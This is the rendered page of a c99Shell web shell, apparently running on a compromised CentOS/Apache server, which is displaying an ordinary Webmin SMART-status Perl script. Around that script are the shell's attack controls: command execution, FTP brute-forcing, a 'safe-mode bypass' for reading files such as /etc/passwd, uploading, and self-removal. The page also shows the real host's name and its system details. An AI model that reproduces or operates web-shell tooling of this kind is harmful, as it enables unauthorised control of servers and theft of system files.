!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/smart-status/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.cgi (4.31 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show all drives and their SMART status

require './smart-status-lib.pl';
&ReadParse();

# Make sure SMART commands are installed
if (!&has_command($config{'smartctl'})) {
    &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1);
    &ui_print_endpage(
        &ui_config_link('index_ecmd',
                [ "<tt>$config{'smartctl'}</tt>", undef ]));
    }

# Show the version
$ver = &get_smart_version();
if (!$ver) {
    &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1);
    &ui_print_endpage(
        &ui_config_link('index_ecmd2',
                [ "<tt>$config{'smartctl'}</tt>", undef ]));
    }
&ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0,
         &help_search_link("smartctl", "man", "doc", "google"),
         undef, undef,
         &text('index_version', $ver));

# Get list of drives
@drives = &list_smart_disks_partitions();
if (!@drives) {
    &ui_print_endpage($text{'index_eidescsi'});
    }

if ($config{'mode'} == 1 || $in{'drive'}) {
    # Just show one drive, selected from menu
    print &ui_form_start("index.cgi");
    print "<b>$text{'index_show'}</b>\n";
    print &ui_select("drive", $in{'drive'},
             [ map { [ $_->{'device'}.":".$_->{'subdisk'},
                   $_->{'desc'}.($_->{'model'} ? " ($_->{'model'})" : "") ] } @drives ],
             1, 0, 0, 0, "onChange='form.submit()'");
    print &ui_submit($text{'index_ok'}),"\n";
    print &ui_form_end();

    if ($in{'drive'}) {
        ($device, $subdisk) = split(/:/, $in{'drive'});
        ($d) = grep { $_->{'device'} eq $device &&
                  $_->{'subdisk'} == $subdisk } @drives;
        &show_drive($d);
        }
    }
else {
    # Show all IDE drives
    foreach $d (@drives) {
        &show_drive($d);
        }
    }

&ui_print_footer("/", $text{'index'});

# show_drive(&drive)
sub show_drive
{
print &ui_form_start("action.cgi");
print &ui_hidden("drive", $_[0]->{'device'});
print &ui_hidden("subdisk", $_[0]->{'subdisk'});
local $h = defined($_[0]->{'subdisk'}) ?
    &text('index_drivesub', "<tt>$_[0]->{'device'}</tt>",
                $_[0]->{'subdisk'}) :
    &text('index_drive', "<tt>$_[0]->{'device'}</tt>");
print &ui_table_start($h, "width=100%", 4,
              [ "width=30%", undef, "width=30%", undef ]);
local $st = &get_drive_status($_[0]->{'device'}, $_[0]);
print &ui_table_row($text{'index_desc'},
            $_[0]->{'desc'});
if ($_[0]->{'cylsize'}) {
    print &ui_table_row($text{'index_size'},
            &nice_size($_[0]->{'cylinders'}*$_[0]->{'cylsize'}));
    }
if ($_[0]->{'model'}) {
    print &ui_table_row($text{'index_model'},
                $_[0]->{'model'});
    }
print &ui_table_row($text{'index_support'},
            $st->{'support'} ? $text{'yes'} : $text{'no'});
print &ui_table_row($text{'index_enabled'},
            $st->{'enabled'} ? $text{'yes'} : $text{'no'});
if ($st->{'support'} && $st->{'enabled'}) {
    if ($st->{'errors'}) {
        print &ui_table_row($text{'index_errors'},
                    "<font color=#ff0000>".
                    &text('index_ecount', $st->{'errors'}).
                    "</font>");
        }
    print &ui_table_row($text{'index_check'},
                $st->{'check'} ? $text{'yes'} :
                "<font color=#ff0000>$text{'no'}</font>");
    }
if ($st->{'family'}) {
    print &ui_table_row($text{'index_family'}, $st->{'family'});
    }
if ($st->{'model'}) {
    print &ui_table_row($text{'index_model'}, $st->{'model'});
    }
if ($st->{'serial'}) {
    print &ui_table_row($text{'index_serial'}, $st->{'serial'});
    }
if ($st->{'capacity'}) {
    print &ui_table_row($text{'index_capacity'}, $st->{'capacity'});
    }
print &ui_table_end();

# Show extra attributes
if ($config{'attribs'} && @{$st->{'attribs'}}) {
    $attrs_count++;
    print &ui_hidden_table_start($text{'index_attrs'}, "width=100%", 2,
                     "attrs".$attrs_count, 1, [ "width=30%" ]);
    foreach my $a (@{$st->{'attribs'}}) {
        next if ($a->[0] =~ /UDMA CRC Error Count/i); # too long
        print &ui_table_row($a->[0],
            $a->[2] =~ /^\s*(seconds|minutes|hours|days|months|years|weeks)\s*/i || !$a->[2] ? $a->[1]." ".$a->[2] : $a->[2]);
        }
    print &ui_hidden_table_end();
    }

# Show raw data from smartctl
if ($config{'attribs'} && $st->{'raw'}) {
    $raw_count++;
    print &ui_hidden_table_start($text{'index_raw'}, "width=100%", 2,
                 "raw".$raw_count, @{$st->{'attribs'}} ? 0 : 1);
    print &ui_table_row(undef,
        "<pre>".&html_escape($st->{'raw'})."</pre>", 2);
    print &ui_hidden_table_end();
    }

if ($st->{'support'} && $st->{'enabled'}) {
    print &ui_form_end([ [ "short", $text{'index_short'} ],
                 [ "ext", $text{'index_ext'} ],
                 [ "data", $text{'index_data'} ] ]);
    }
else {
    print &ui_form_end();
    }
}


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0132 ]--